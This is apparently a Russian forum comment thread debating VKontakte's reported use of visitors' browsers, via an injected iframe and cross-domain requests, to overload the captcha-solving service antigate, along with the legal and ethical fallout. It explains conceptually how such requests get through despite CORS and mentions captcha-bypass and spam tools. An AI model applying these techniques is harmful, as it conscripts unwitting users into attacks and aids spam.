0
А если я этот ключ достал из кармана спящего хозяина, сходил сделал копию, а потом положил обратно?
-1
Ок, наборы отмычек можно легко купить. В чём разница с ними?
UFO landed and left these words here
+1
Нет, это отмычка, которую надо уметь использовать. Надо сохранить картинку себе, создать соединение до антигейта, грамотно сформировать пакеты и переслать их, после чего ждать ответа. Как и за любой другой сервис — за это надо платить. Есть и капчи, которые использую тот же принцип — распознают людьми сканированные слова, с которыми не справились роботы.
UFO landed and left these words here
0
Я думаю, что компьютер был создан для автоматизации рутинных действий. Я часто пишу макросы для экономии своего времени. Защита от ботов должна вестись иначе, я согласен на анальный чип для идентификации, но тут от меня требуют выполнять тупое действие, которое другие готовы делать тысячу раз за доллар. И именно это близко к оскорблению.
0
Насколько мне известно, в уголовном деле обязательно должен фигурировать умысл. Если его нет, то вроде осудить не могут.

Например, доктор и преступник тыкают в человека острыми предметами, но один это делает с согласия и во благо, а второй с преступным умыслом. Ну или же без умысла, а потому, что на голову больной. При этом осудить могут только того, который делает это с умыслом.

Если говорить ближе к антикапче, то отсутвие умысла можно доказать демонстрацией набора мер, которые противодействию использованию сервиса в противоправных действиях. Как мимнимум механизма блокировки замеченных за чем-то черным запросов. Как доказывать умысел, кроме как представлением несостоятельных методик легального использования сервиса я не представляю.

И, чем сравнивать с домушниками, вернее сравнивать с ОПСОСами, которые дают сервисы рассылки платных смс, добрая часть которых используется для развода граждам на бабки.
0
Есть не только умысёл (субъект предвидел и желал наступивших опасных последствий), но и легкомыслие (предвидел возможность или даже неотвратимость, но не желает и самонадеянно считает, что не наступят — «понадеялся на русский авось») и неосторожность (не предвидит, хотя должен, например согласно полученному образованию). Правда далеко не по всем статьям можно за них привлечь к ответственности. Из «компьютерные» статей только к 274 (нарушение правил эксплуатации) кажется.
+3
А это не таксист, это товарищ, который создал целую организацию по доставке воров к банкам.
Ну всё же понятно, для чего создан антигейт. То, что формально по закону доказать это сложно — это одно, но это не значит, что они белые и пушистые.
Да, вконтакте сделал некрасиво, но антигейт от этого гадюшником быть не перестал. Любят у нас демагогию разводиь…
-4
ничего он не создал, он просто разгадывает картинки. Обеспечивает китайцев едой, занимается благотворительностью можно сказать.

К чему все эти аналогии? Антигейт просто занимается оцифровкой текста. Гугл капча делает тоже самое.

:)
+2
Вот смотрите, взломщик взламывает сайт.
Поисковик во время взлома сайт вроде бы не взламывает, он так помог взломщику найти «интересные» места на сайте. Но сядут не все.

Вот смотрите, «пират» хочет получить халявный контент для последующего распространения.
ВК во время поиска вроде бы контент не распространяет, он так помог «пирату» найти контент и получить его. Но сядут не все.

Вот смотрите, совершается вооруженное нападение.
Оружейник и продавец во время нападения вроде бы не нападают, они так сделали/изобрели оружие и продали его. Но сядут не все.

Плюс, насколько я знаю, спам у нас не является преступлением (поправьте, если ошибаюсь).
Плюс, выше было несколько примеров вполне «белого» общественно-полезного применения.
Это как пытаться похоронить ядерную физику, ибо она, дескать, позволила человечеству сделать атомное оружие. И заметьте — все участники знают, что их произведения могут быть использованы в «плохих» целях.
Я согласен с тем, что направленность явно указывается на сайте, однако она же не столь ограничена, и они никого не заставляют использовать их сервис именно так.
UFO landed and left these words here
0
Так поисковик, ВК и оружейник/продавец/ученый тоже знали о том, как могут использовать и используют их сервис.

Антигейту же отправляется ключ и капча в виде картинки, как предлагаете ему узнавать цель распознавания текста с этой картинки? В POST «i_am_a_bag_guy» => «1»? Вот вам и возможное доказательство. В их каталоге программ есть и разделы «Другое», «Скрипты и библиотеки», если вы о «прямых посылах к использованию сервиса распознавания именно так».

Так и поисковик, ВК и оружейник/продавец/ученый тоже те, кто подсказывают места/показывают и помогают искать контент/подвозят патроны и дают оружие в руки взломщика/«пирата»/преступника.

Я не очень люблю ВК, но также не считаю ВК таким уж «пиратским» сайтом, ибо его основная направленность совсем не в этом — кто же виноват в том, что на него загружают «пиратский» контент? Что они могут сделать — убирать, и они же порой это вроде делают. Ютуб вон вроде пытается распознавать контент, защищенный авторскими правами — у каждого свои методы, но это опять же — пытаться винить физиков за то, что они помогли прийти к атомной физике и способствовали человечеству открыть и сделать атомное оружие.
0
Плюс к «методам»:
And of course, it is strongly prohibited to use our service in any SPAM operations and all those related things that generate any butthurt for the «big guys».

Вот вам и метод, хоть и введенный совсем недавно :)
+1
Отлично, а вконтакте распространяет музыку, видео (среди которого много порнографии). Аналогично rutracker. Но в случае чего сядут за распространение не владельцы, а люди, которые распространяли. Ваша аналогия не для всего справедлива.
UFO landed and left these words here
UFO landed and left these words here
+2
Так если _все_ средства хороши — надо идти и душить спамеров насмерть. А то законы когда поднятутся… Ой, нет, уже не все средства хороши? Или все, пока лично вас не поймают?
0
Нарушение правил вконтакта, а не УК РФ.
С каких пор невыполнение пользовательского соглашения контакта стало преступлением?
И да, про спам.Ты давно его получал? Я нет, к примеру.
И не только для спама используют антигейт.Я года 3 назад занимался инвайтингом на самописных скриптах.Т.е. рассылка приглашений в группы, приложения и т.п.Причем с аккаунтов зарегистрированных моим же скриптом.Ничего, кажется, не нарушал.
Любить спамеров или нет это личное дело каждого.Но чушь же зачем писать, про преступления?
UFO landed and left these words here
+1
А я не говорю про правила сервиса.Самая страшная их санкция это блок аккаунта.
А вообще, расскажу кое-что.Зачастую антигейт не при делах, когда спамят на форумах.Хрумер очень годно самостоятельно разгадывает капчу.

Господа, прошу не принимать за рекламу :)
UFO landed and left these words here
0
Само собой. Может конечно он (хрумер) и может спамить вконтактик, но не каждый может его себе позволить (ценник около 600$)). А вот спец софтинки, которые специализируются на вконтактике за 50-100$ может позволить почти любой.

з.ы. Если мне память не изменяет, хрумер спец по форумам, а не по соц. сетям.
0
гм… а массовая рассылка приглашений в группы это не спам???
такой же спам. Какая разница, на почту мне пришла ссылка с предложением перейти на сайт и увеличить пенис, или пригласили в группу где предлагают увеличить пенис.
0
MaxUp: Простая аналогия: Вы вырезали всю рекламу? Удалите адблок. Это решение владельца сайта. И вы должны смотреть на рекламу. Она размещена во благо, дабы держать вас в курсе событий. Попытка обойти это правила — нарушение правил. Разве это не подобие?
UFO landed and left these words here
0
а, вот чего они убрали фрейм — потому что там форма сабмитилась с параметром target="_top", и был переход ВСЕЙ страницы на другой сайт из вконтакте
UFO landed and left these words here
+16
А вообще, мне не нравится даже не «игра» вконтакта против антигейта.Больше мне противен пафос, с которым они это делают.
first_and_last_warning (Первое и последнее предупреждение)
Экую угрозу Паша кинул, гордо запрокинув голову и кинув пренебрежительный взгляд.
-1
Блин, ну кто так новости пишет? Пришлось прочитать туеву хучу комментов, чтобы понять, что это за антигейт такой и в чем вообще дело…
+5
Гениально! А я-то глупый, не догадался!

PS: Потому что он выдает 502
UFO landed and left these words here
-4
С точки зрения долгосрочной перспективы — ВК молодцы. Всё правильно делают.
Комменаторам совет: чуть-чуть вперёд отмотайте ситуацию и подумайте, являются ли действия ВК примером, которому могут последовать другие, или нет .)
+6
если вы считаете что со смертью антигейта спама станет меньше то спешу вас разачоровать, это уменьшение никто не заметит, ибо тысячи их(сервисов).

А использовать школометоды да еще и на клиентской стороне это далеко не то что должна делать такая большая компания. Всреавно что яндекс начнет ддосить когонить.

Лично у меня только нерпиязнь к контакту появилась из за этого и не более.

Единственный способ выпилить антигейт — пусть дуров его купит, он это любит.
+1
Шикарно. Возвращаемся в эпоху, когда не было судебной системы и законов, а было только право сильного. Только теперь меряем не физическую силу, а количество пользователей.
Я за то, чтобы примеру ВК последовал гугл, с заменой антигейта на ВК. Правда, в этом случае без интернета рискует остаться половина России, ну да это мелочи:)
0
Ну так и спам, насколько я помню, запрещён законодательством
-1
Да, до сих пор висит onload="_test()"
хотя сама функция пустая. Видимо включают периодически.

УК РФ.
0
Прочитал обе статьи и как-то не готов однозначно назвать вконтакте злодеем, при всей моей не любви к нему
+6
Лично я не разрешал использовать свой компьютер для DDoS'а каких-либо сервисов. К тому же меня не предупредили об этом.
Разборки ВК с антигейтом — это их проблемы, нечего впутывать юзеров в их разборки.
К тому же, а вдруг я сейчас сижу с GPRS'а и плачу за трафик? 60-100 кб в минуту только на запросы — это сильно дофига, не находите?

Если они такое творят, где гарантии что завтра они не обозлятся на другого врага, а тот в отместку будет выдавать сплойт-пак. В результате чего я могу потерять данные/пароли/деньги/нервы?

Фактически, они:
1) организуют DDoS атаку
2) делают пользователей соучастниками
3) тратят трафик пользователей
4) подвергают их опасности
-2
я понимаю это, именно с этой позиции они поступили нехорошо, но если смотреть на тех, кто подвергся ддосу, моя позиция становится нейтральной
+4
Да не важно кто подвергся, хоть секта педофилов.
От этого их поступок этичнее не становится.
-2
Как раз, становится. Вы тут ниже везде пишете про законы, попробую привести вам пример этой ситуации из реальной жизни: человек угнал у вас машину покататься — он негодяй, человек угнал у вас машину, чтобы довезти раненого до больницы — в принципе, поступил не особо плохо.
Ещё раз повторю, что вконтакт не оправдываю, но и не сторонник огульного осуждения.
+3
Понимаете в чем загвоздка, не нужно увлекаться аналогиями, они дают ложное представление о редмете разговора. Конкретизирую на вашем примере:

Кто здесь раненый? — сам ВК, пользователи страдающие от спамеров?
Угнал машину — что такое моя машина? мой трафик? — они его мне не вернут. DDoS антигейта?

В данном случае вы получаетесь сторонником огульного оправдывания. ВК поступил аморально по отношению к пользователям, возможно даже уголовное преступление. Его мотивы — дело десятое.

-2
Конечно, примеры всегда утрированные. Да, «раненые» здесь пользователи, при чём, не только ВК, страдающие от спама. Если уж очень хочется, то с угонщика можно потребовать деньги за бензин и амортизацию машины, как и с контакта за ваш траффик
-1
вы пользовательское соглашение ВК принимали?
вот как прикажете действовать если там появится строчка «пользователь дает согласие на участие в експерементальных сборках портала»
+3
И кстати, если бы я был зарегистрирован во вконтакте и если бы он спросил, хочу ли я участвовать в ддосе спамеров, то я бы непременно согласился.
-1
Ну, в этом случае можно и рассуждать, здесь же никто никого не спрашивал.
0
Как я оцениваю их действия:
1) Вовлекли пользователей без разрешения в ддос: карма -1
2) Ддосили спамеров и кривой сервис: карма +1

В итоге: 0, то есть, я не одобряю, но и делать из ним монстров не стал бы
-1
Как я оцениваю их действия:
1) Вовлекли пользователей без разрешения в ддос: карма -100500
2) Ддосили спамеров и кривой сервис: карма -100500
+1
Ддосили не спамеров, за это все были бы рады, а ддосили сервис. Я на нём однажды делал смс оповещение о температуре помещения раз в 4 часа через сайт МТС. Выходило дешевле чем брать пакеты смс у разных онлайн апи.
0
Думаю, не стоит строить иллюзий: количество полезных применений сервиса стремится к нулю
0
Распознавание рекапчи приносит там кому-то пользу, собственно её придумали, чтоб хоть какой-то смысл был в распозновании. Этакий невольный краудворкинг или как там его.
0
Ага, оно приносит пользу спамерам и единицам типа Zibx, всё посыпаю голову пеплом: ради того, чтобы Zibx смог сэкономить пару копеек я готов терпеть тонны спама
0
Рекапча — это сервис, совмещающий обычную капчу, на благо владельцев сайтов, которые её ставят у себя, и оцифровку бумажных (или каких-то ещё) носителей на чьё-то ещё благо (вроде даже общественное).
0
Всё здорово, только не понятно, как эта информация соотносится с нашим тредом
0
Распознавание именно рекапчи (и картинок схожих сервисов) приносит вполне конкретную пользу владельцам этих сервисов. Причём мы их распознаём бесплатно, а «спамеры» платят за это «китайцам».
+1
Да нет же, применение может быть самое разное. Хрен с ним с баблом, важнее время. У нас же даже в логине на хабру капча. У меня есть мания автоматизировать всё что может быть автоматизировано. Можно, например, построить умный дом, на базе siri для распознавания голоса или иной технологии и говорить ему голосом.
И тут два варианта:

1)
— Вам два новых инбокса
— Прочитай

2)
— Хабрахабр опять разлогинился, зачитай мне капчу с телевизора
— Эс как доллар, пятнадцать джей
— Повторите запрос
— Эс как доллар, один пять джей
— Неверно, повторите попытку
+10
Тем, кто пишет, что ВК молодцы и всё делают правильно.
Команда ВК, по сути, присваивает себе право решать, какие ресурсы хорошие, а какие плохие (и их следует ущемлять в правах).
Совершенно неважно, нарушает ли на самом деле антигейт закон или нет — решать это (и принимать меры) должно государство. Коммерческая компания права на это не имеет.
Ибо обосновать, чем плох тот или иной ресурс, можно всегда. И, соответственно, оправдать атаку на любой сайт.

В октябре 2010 доля google в мировом трафике была 6.4%. Скорее всего, запас в 1% у них есть.
Гипотетическая ситуация: кто-то умный придумал мегакрутой алгоритм ранжирования, показа рекламы и т.д. Даже нашел под это дело некоторое количество инвестиций, купил для начала десяток серверов, запустил новый мега-поисковик. Он действительно очень крут, набирает популярность с огромной скоростью.
Гугл: так, ваш поисковик дает много ссылок на нелегальный контент [потому что он действительно интересен пользователям], это нехорошо. Вот вам в качестве подарка 1% от нашего трафика; этого хватит, чтобы забить канал вашего датацентра и пары соседних.
Результат: историю гугла повторить уже не получится даже теоретически.
-6
я согласен частично, но:
нарушает ли на самом деле антигейт закон или нет — решать это (и принимать меры) должно государство.
подобные фразы меня всегда умиляли: разве в этих государственных службах работают боги, которые никогда не ошибаются и всегда объективны и справедливы, а не такие же обычные люди?
+1
Нет, они не боги.
Но право на наказание за нарушение законов должно быть монопольным. И, желательно чтобы обладал им тот, кто имеет минимальный собственный интерес в конкретных делах. Т.е. явно не коммерческая компания.
А если все начнут определять, кто чего нарушил, и самостоятельно принимать меры — начнется хаос. См. также: ru.wikipedia.org/wiki/%D0%A1%D1%83%D0%B4_%D0%9B%D0%B8%D0%BD%D1%87%D0%B0
0
Сраный либерализм. Если на вас на улице нападёт гопник, не смейте его бить защищаясь — этим должна заниматься наша доблестная милиция
+1
В рамках необходимой обороны смеете. И вступиться за кого-то можете. Но вот если увидите вора во время воровства и сломаете ему ногу, чтобы не убежал до приезда полиции — у вас вполне могут быть проблемы.
+1
Антигейт спамит вконтекте перманентно, поэтому сейчас именно та ситуация, когда они обороняются в драке.
Ну сами ответьте себе на вопрос, только честно: что эффективнее, написать в полицию заявление и ждать, пока господа полицейские вынесут отказ или самому попытаться бороться со спамерами?

И я ещё раз повторю, моя позиция в этом вопросе не что Вконтакте белый и пушистый, а что Антигейт плохой и Вконтакте не очень хороший.
0
>>Антигейт спамит вконтекте перманентно

proof? с чего Вы взяли, что антигейт вообще спамом занимается?
+1
Думаю, если бы антигейт спамил вконтакте, то уже давно господа полицейские бы занимались этим делом.
0
Пожалуйста, оставьте хоть единицу кармы, я готовлюсь опубликовать пост про квадрокоптер
0
Это самооборона, а не наказание. И при защите я имею право его бить, и если при этом сломаю ему руку — меня (скорее всего) оправдают.
А вот на следующий день взять дома оружие, найти гопника и в качестве наказания сломать ему руку — не имею права, и меня за это посадят. И это правильно.

Не путайте самозащиту и возмездие.
+1
Какое возмездие? Вы действительно считаете, со с Антигейта вконтакт спамили только один раз, а он теперь мстит? Или догадываетесь, что это происходит каждый день и наверняка происходило и в момент ддоса
0
Итак. Вы считаете, что ВК имеет полное право решать, какой сервис им мешает, какой — нет. И, нарушая законы, самостоятельно принимать меры против сервисов, которые им мешают?
Вам кажется, что антигейт не имеет право на существование, мне — что имеет. И у команды ВК ровно столько же полномочий решать этот вопрос, сколько у меня или у Вас. То есть нисколько.
Если ВК имеет право самостоятельно принимать меры по самозащите в некритических случаях, то тоже самое право есть у каждого.

Смотрите пример выше. Я совершенно искренне уверен, что Вы должны мне крупную сумму денег. Но это не дает мне права вломиться в Вашу квартиру и набрать там ценностей на эту сумму. Такого права у меня нет даже в том случае, если Вы действительно должны мне эти деньги, у меня есть нотариально заверенная расписка и весь президиум ООН в качестве свидетелей.
0
Эм, а разве кто-то другой, кроме вас, может определить, что вам мешает и наносит вред?
Я понял уже вашу симпатию к спамерам, но всё же, на основании чего вы решили, что ситуация некритическая? Я лично сам страдаю от спама (не во вконтакте), и друзья, там зарегистрированные, постоянно на него жалуются. Поэтому, всё-таки, аргументируйте, почему ситуация некритическая, чтобы не защищаться?

Про сумму денег вы написали откровенный бред, я даже комментировать не буду.
Но постараюсь привести ещё один пример, на для вас, для других читателей:
представьте ситуацию, что какой-то хрен постоянно ставит свою машину на тротуаре около вашего дома так, что вам приходится обходить по лужам. Вы пробовали с ним поговорить, он просто шлёт в известном направлении. Вы пробуете вызывать ГИБДД, но это неэффективно, потому что им пофиг и они приезжают не всегда или с большой задержкой, причиняя вам большие неудобства. Отчаявшись после месяца безуспешной борьбы с таким человеком. Вы находите крайне простое решение: выкручиваете золотники из колёс этого человека, каждый раз, как только он ставит машину на тротуар.
Справедливо?
+1
Может. Суд. Точнее, я должен убедить суд в том, что мне наносится вред. И, если смогу, то суд определяет размер компенсации.
«Критическая ситуация» — это угроза жизни либо здоровью. То есть та, которая дает право на самооборону. К юр. лицам это вообще неприменимо. Если ВК считает, что спамеры приносят им убытки — пусть подают в суд и доказывают, что убытки в N-ом размере были.

А всё-таки прокомментируйте. Почему команда ВК и Вы имеете право решать, что мешает, а что нет, а я — не имею такого права?

Очень спорный вопрос, справедливо ли. Но незаконно — точно.
Если Вы считаете, что кто-либо (водитель, ГИБДД, инопланетяне) нарушает гарантированные Вам законом права — обращайтесь в суд. Если же неудобство Вам создает чья-то деятельность в рамках закона — сделать можно очень мало что.
0
Поэтому, всё-таки, аргументируйте, почему ситуация некритическая, чтобы не защищаться?

Потому что очевидно, что они не спамеры?
Простите, что влезаю.
+1
Угу, и каптчу распознают только для того, чтобы лекарство от рака создать
0
Нет, я этого не говорил, не нужно приписывать этого мне.
Однако вы утверждаете, что они «спамеры», а это не так. Они предоставляют сервис распознавания текста с капча-картинок, вот и все. А как это используется — это уже вина исключительно пользователей-спамеров, а не их.
+2
А я вам и не приписываю ничего.
Следуя вашей логике любой, хозяин наркопритона, когда к нему завалят менты, скажет: «А вот нихрена это и не притон! Я лишь предоставляю место, шприцы, уксусный ангидрид, алюминиевую ложку и газовую плитку, „А как это используется — это уже вина исключительно пользователей“-наркоманов, а не моя»
-1
О содержании притонов есть отдельная статья (232). А о распознавании капч — нету.
+1
Ну все-таки вы преувеличиваете, если проецировать на наркобизнес, антигейт предоставляют пакетики для расфасовки «порошка» скорее, чем притоны. Система распознавания капчи не основная сложность в распространении спама.
0
Нет, вы не вполне верно поняли мою логику.
К тому же, антигейт не знает, на что будет использована та или иная отправленная ему картинка, в отличии от владельца притона. К тому же, антигейт предоставляет даже не альдегид и не ложку, он скорее лишь дает инструкцию по их покупке.
Более того, на распознавание капч не только статьи нету, так никто мне и не показал, где правилами сайта запрещено распознавать капчу другому человеку. Может, вы покажете?
-1
Но вы сказали «Угу, и каптчу распознают только для того, чтобы лекарство от рака создать» так, будто это сказал или подумал я.
+1
Эм, вот сейчас как раз вы мне приписываете то, чего я не говорил и не делал
-1
Хорошо, положим, мне показалось, что вы имеете это в виду. А сказали ведь вы именно эту фразу.
0
И снова минусующие без аргументов. Господа, не игнорируйте дискуссию :)
UFO landed and left these words here
0
для взлома защиты сайтов

Угу, SQL-инъекции через антигейт искали. Или вводить каптчу не самому считается взлом защиты? Мне сервер ВК отдал картинку, я имею право делать с ней что хочу: хоть распознать, хоть удалять или себе на сайт скинуть. То, что картинки от ВК отправляются на антигейт — заслуга только пользователей, а не сервиса.

В этом случае ВК просто сторонник нечестной конкуренции — зачем пытаться законными способами что-то уладить, если можно просто положить сайт неприятеля? Какой антигейт плохой мы уже слышали, другое дело что на его месте может оказаться, например, новая конкурентоспособная для ВК соц. сеть, которую они также завалят. Нет никакой разницы кого ддосят, если на тебя на улице нападут с ножом, а ты его выхватишь и убьешь нападавшего, то суд над тобой будет.
-1
Неправда. Есть такая вещь, как самооборона. Т.е. для защиты своих основных прав — например, права на жизнь и здоровье — Вы можете, при необходимости, нарушать аналогичные права других.
Вот только у юр. лиц права на самооборону нет, и быть не может.
0
Убийство при самообороне случаев считается превышением самообороны, статья 108 есть. Если вы руку ему заломом сломаете, то может быть ничего и не будет. И вы полностью проигнорировали основной текст комментария, а обратили внимание только на пример в последнем предложении.
+1
Именно превышение. Это довольно расплывчатое понятие.
Т.е. если завяжется драка, в которой удастся выхватить нож и ударить — то, скорее всего, признают, что превышения не было.
В общем, тут всё зависит от конкретного случая.
Но, в любом случае, к юр. лицам это неприменимо.
0
А, не вы автор того комментария, тогда прошу прощения, последнее предложение к вам не относится :)
UFO landed and left these words here
+1
Законен ли антигейт — отдельный вопрос. Мне кажется, что да, но я не юрист. И в данном это совершенно неважно.
Действия ВК очевидно незаконны. Если им кажется, что кто-то другой нарушает закон — пусть пишут заявление в милицию.
Мне вот кажется, что Вы украли у меня много денег. В честь этого я взломаю Вашу квартиру и вынесу денег и ценностей на соответствующую сумму.
Если Вы оправдываете действия ВК, то ровно на том же основании должны оправдать и мои действия.
UFO landed and left these words here
+2
«first_and_last_warning» — вполне себе доказательство умысла, нет?

Хорошо, я предварительно много раз скажу Вам, что Вы должны мне кучу денег.
На практике, если я сочту, что мои права нарушаются (Вы взяли в долг и не отдаете), то я должен идти в суд, а не предпринимать самостоятельные действия по взысканию этого долга.
Если ВК считает, что антигейт нарушает их права — он должен идти в суд, а не досить.
Для физ. лиц самостоятельная защита своих прав в обход правоохранительной системы называется самоуправством. Как это называется для юр. лиц — не знаю.
0
Юридическое лицо это множество физических лиц, каждый из которых несёт ответственность за свои незаконные действия (в том числе выполнение заведомо незаконного приказа).

Если дойдёт до уголовного суда, то наверняка будет звучать фраза «группа лиц по предварительному сговору»…
0
По 274-й достаточно неосторожности. А по 273-й вообще достаточно факта создания, распространения или использования вредоносной программы.
+1
Запрещено использовать софт для массовой, автоматической регистрации. Запрещено использовать массовое аккаунты. Для этого вводятся защита в виде капчи.

Допустим, использование софта запрещено. Антигейт и не использует.
Однако, распознавание капчи другим человеком не видел чтобы где-то было запрещено, не покажете?
Или скажете, что если с вами рядом например сидит товарищ, и вы оба ждете скачивания какого-то интересного файла, и товарищ «прочел» капчу на скачивание быстрее вас и подсказал — это преступление? Или вы попросили его, например, «слушай, я сейчас другим занимаюсь — введи пожалуйста пока капчу»? Более того, антигейт даже не вводит — он только распознает присланные ему капчи, вводит уже пользователь.
Притом распознавание капчи человеком не несет никакого прямого убытка, который бы принес взлом, ПРОТИВОВОРОТА скорее дают ключ к воротам, взглянув на них, вот и все. Более того — они даже не знают, что это за ворота и от чего они по идее должны защищать, и чьи они.
+1
Запрещено пользователям. Антигейт контактом не пользуется. Защиту он не ломает, а лишь предоставляет инструмент для облегчения процесса автоматизации (весь процесс он не автоматизирует). Вот скажем сайты, публикующие радужные таблицы, виновны в том, что их используют для взлома?

0
Суд будет, если прокурор решит, что имело место превышение необходимой обороны (не обязательно «само»). А «посадят» только если и судью в этом убедит.
0
Наш сайтик бы кто-нибудь так потестировал нагрузочно :-)
+4
во-первых есть утилита ab
во-вторых, сайт еле справляется, думаю ДоСить не требуется…
0
1) ддосить не надо, вопрос был потестировать — сколько держит blogger; согласно предыдущему хаброэффекту знаем, что 18 000 в день держит

2) к слову, там не только блоггер

3) и см. комментарии выше — у кого-то таки не работает
+11
А зачем они пытались XMLHttpRequest-ом на чужой домен ходить, кто-нибудь понял? XMLHttpRequest же не кроссдоменный ни разу. Или я чего-то не понимаю, или тот, кто придумал сначала дырявый метод с iframe, а потом еще и неработающий метод с XMLHttpRequest, совсем начинающий (искренне надеюсь на первый вариант).
+6
Я вот, кстати, тоже удивился как увидел и ушел читать документацию, наверное они это на эмоциях.
0
Видимо, они хотели сделать «как-бы запрос к API» антигейта что-бы не спалиться в логах особо.
+1
Почему, в некоторых браузерах (не помню, но там последние версии chrome вроде есть) умеют кроссдоменный XHR.
+7
Браузер будет делать запрос, чтобы проверить, отдает ли удаленный сервер заголовок Access-Control-Allow-Origin, значение которого должно совпадать с заголовком запроса Origin:
Запрос
GET / HTTP/1.1

Origin: vk.com

HTTP/1.0 200 OK
Access-Control-Allow-Origin: vk.com

Так что технически браузер в любом случае делает запрос, чтобы проверить наличие этого заголовка и его значение.
Кстати вк сейчас вроде бы убрал XMLHttpRequest ajax-запрос.
+9
Да, действительно, так и есть. Причем самое смешное в этом то, что, например, в Firefox таким образом посылаются даже POST-запросы (причем на целевой URL), и сервер их принимает. Но вот только ответ клиент не видит (из-за отсутствия в нем Access-Control-Allow-Origin), но в данном случае это и не требуется. Т.е. XMLHttpRequest в новых браузерах в любом случае шлет указанный запрос на указанный URL (с добавленным заголовком Origin), независимо от домена, но вот принимается ответ или нет — уже зависит от Access-Control-Allow-Origin в ответе.

Так что я был неправ.
+9
Кстати, Антигейт хорошо, быстро и практически без ошибок распознает капчу. Хороший сервис.
+4
Восстанавливая свой пароль вы работаете на них.
Там капча рандомная, частенько от вк вылазит.
0
наверняка можно. антигейту присылается картинка, происхождение которой может быть самым разным.
+2
В итоге antigate работает как раньше, а Вконтакте себе карму сильно попортил. Уверен, что более высшим руководством нежели Дуров будут сделаны из этого орг. выводы.
+23
Антигейт в срочном порядке перевел сайт на английский язык и выводит:

And of course, it is strongly prohibited to use our service in any SPAM operations and all those related things that generate any butthurt for the "big guys".
UFO landed and left these words here
+6
Вконтакте как обычно наплевательски относится к пользователям. И это самая популярная сеть в СНГ. Позор.
+6
Какой позор! Представьте на секунду, если бы в таком был замечен фейсбук там или твиттер — во первых они бы очень долго отмывались, а во вторых к вечеру на столе у судьи уже бы был class action lawsuit от пользователей, по которому, скорее всего, в результате им бы пришлось много платить. Поэтому там такого не будет и там уважают чужие права. А в совке на закон плюют сами граждане, суды, органы внутренних дел а теперь еще и вконтакт.

Хотя чему удивляться — это те же люди, что сперли дизайн фейсбука. Натуру не скроешь, вот она и вылазит.
-9
Я не понимаю что все так против VK настроены. Приватные сведения никуда не утекли и мы получили много лулзов. Главное чтобы не превратилось в традицию.
+10
Потому что VK продемонстрировал готовность использовать свою популярность в своих целях совершенно незаконными методами.
-2
Совершенно незаконными тоже сложно сказать. Неэтичными — да. Незаконными — какой закон нарушили?
-1
За ДДоС серверов/сетей, к работе с которыми вас официально не допускали — имхо, нет. Грубо говоря, если мы с вами начнём (ди)досить хабр, то статья (пункт соглашения «не нарушать работоспособность сайта путём размещения информации, содержащей вирусы, создания дополнительной нагрузки на сервер, применением программ, не обусловленных функциональным содержанием информационного ресурса и иными способами.»), если же начнём (ди)досить произвольный сайт, с которым никаких соглашения не заключали и вообще никогда на нём не были — сомнительно, имхо. Прямого запрета на (ди)дос в законах нет (имхо), а правила сайта, которые мы не обязывались выполнять, для нас не обязательны. Вот если создадим ботнет, то за его создание и за атаку нас можно привлечь, но за создание, распространение и использование вредоносных программ, но не за нарушение правил эксплуатации «ЭВМ».
+2
Да почему обязательно ДДоС? Реальный риск моими персональными данными — раз, я наблюдал порно вместо своей странице вконтакте — два, вместе со мной это наблюдало несколько миллионов детей и взрослых — три, их не взломали, они сделали это сами, а значит они сделали так, что: дети увидели благодаря им порнуху. уже за одно это могут отхватить штраф.
+2
то, что приватные данные никуда не утекли только потому, что antigate сделали редирект на xvideos, а не на фишинговую страницу, сделанную за 10 мин на коленке. Или они могли сделать http auth, на который повелось бы не малое количество пользователей контакта. Да и мало ли чего еще придумать могли.
Так что VK реально рисковал.
+1
Не, я боюсь к таким проектам прикасаться, могу налажать так же как они.
+3
Считаю действия ВК совершенно неправильными, наплевательскими к пользователю и даже неправомерными.
Не важно кого они хотели за ДДоСить из-за внутренних проблем со спамом, даже если действительно из-за услуг антигейта ВК несет убытки или имеет какие-либо проблемы.
Правильнее было бы поменять способ авторизации человека. Считаю капчу в том виде как она есть — не эффективной. Нужно использовать нечто другое, более простое для человека и более сложное для решения машиной. Например выдавать для авторизации какую-нибудь флешку. где нужно провести мышкой по контуру, или выбрать картинку соответствующую подписи, так чтобы это нельзя было передать на сторонний сервис для распознания китайцами, и так чтобы цифровыми методами было такое распознавание проводить нерентабельно.
0
Если они смогут передать на браузер, то спамеры смогут передать на сервис. А разпознаёт не машина, а люди и не только китайцы.
0
а если там будет флешка, где-то надо чего-то подвинуть, после этого во флешке устанавливается внутренняя переменая, которая потом передаётся джаваскрипту. Джаваскрипт её проверяет и только тогда пускает, тогда как тут китайцы помогут?
0
Придумают что-нибудь, наверное. Весь код в распоряжении клиента, возможные ключи шифрования — тоже.
+12
antigate молодцы, встали быстренько на cloudflare, включили «hotlink»-protection с домена vk.com и в ус не дуют.
UFO landed and left these words here
+2
По сути, в ddos`е нет состава преступления
это надо следователям объяснить
-1
Блокирование информации если произошло («легальные» пользователи получили 5xx) то формально некоторые признаки преступления есть. Или нарушение работы (сервер упал).

Другое дело, что по некоторым трактовкам субъектом 274-й может быть только должностное лицо или лицо, заключившее договор и официально допущенное к работе на «ЭВМ». То есть это могут только пользователи (включая администраторов) корпоративных и подобных сетей. Возможно зарегистрированные пользователи некоторых ресурсов, возможно клиенты некоторых провайдеров. В общем там, где ты знаешь или должен знать правила эксплуатации оборудования, каналов, ресурсов и их нарушаешь. С прямым ли умыслом («положим сервер работодателя, раз выходные не даёт»), с косвенным ли («предупредим, и фиг с ним, что сервер может лечь»), по легкомыслию («предупредим, вряд ли сервер ляжет, всего гигабайт поток создаём») или по небрежности («упс, не думал, что это может сервер положить») — не суть, должен был соблюдать, но нарушил — отвечай (если нанесён «нужный» ущерб).
-4
Подумаешь, айфрейм… кто докажет, что это ДДоС? Был несанкционированный доступ к компьютеру? Или мы теперь будем все сайты за рекламу вешать (они же не говорили, что тут реклама будет)?
+1
Этот iframe однозначно направлен именно для атаки. «first_and_last_warning» тонко на это намекает.
-2
Атакой, не имеющий целью блокирование информации или чего-то в этом роде. Именно предупреждение.
+3
Я никак не собираюсь оправдывать действия ВКонтакта, которые заслуживают всяческого порицания, но пожалуй, в чем-то они мне нравятся. Не сам «ддос», конечно, но во многих их действиях есть хакерский дух в хорошем смысле этого слова (вряд ли скрипт был внедрен ради получения прибыли). Безобидные ведь, по большому счету, вещи. На фоне все более серых и скучных Фейсбука и Гугл+, ВКонтакт выглядит очень живо (хотя я прекрасно понимаю недостатки этой социальной сети). У амбициозной компании должна быть своя «темная сторона», вспомните Apple времен молодого Стива Джобса.
+3
«Чтоб ты жил в интересные времена!» (старинное китайское проклятие)
